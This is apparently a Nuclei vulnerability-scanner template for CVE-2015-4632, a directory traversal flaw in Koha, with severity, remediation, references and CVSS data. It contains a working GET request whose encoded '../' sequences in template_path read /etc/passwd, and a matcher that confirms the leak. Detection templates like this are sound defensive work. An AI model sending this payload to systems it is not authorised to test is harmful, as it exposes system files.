nuclei-templates/http/cves/2015/CVE-2015-4632.yaml

46 lines
1.9 KiB
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/37388
- https://nvd.nist.gov/vuln/detail/CVE-2015-4632
- https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
2023-07-11 19:49:27 +00:00
- https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
- https://koha-community.org/koha-3-14-16-released/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-4632
cwe-id: CWE-22
epss-score: 0.0282
epss-percentile: 0.8961
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: koha
product: koha
2024-01-14 09:21:50 +00:00
tags: cve2015,cve,lfi,edb,koha
2021-09-27 11:02:48 +00:00
http:
2021-09-27 11:02:48 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type: status
status:
- 200
# digest: 490a0046304402201f23cf28d9ae25b67dbe7a04cc72cf8b419270de16da749ececc1f3ab6fb6c1e02207d639d4f467a098103e1f48ec0b449c16ee1c4e1d7dd07f8d96f923b37a24889:922c64590222798bb761d5b6d8e72950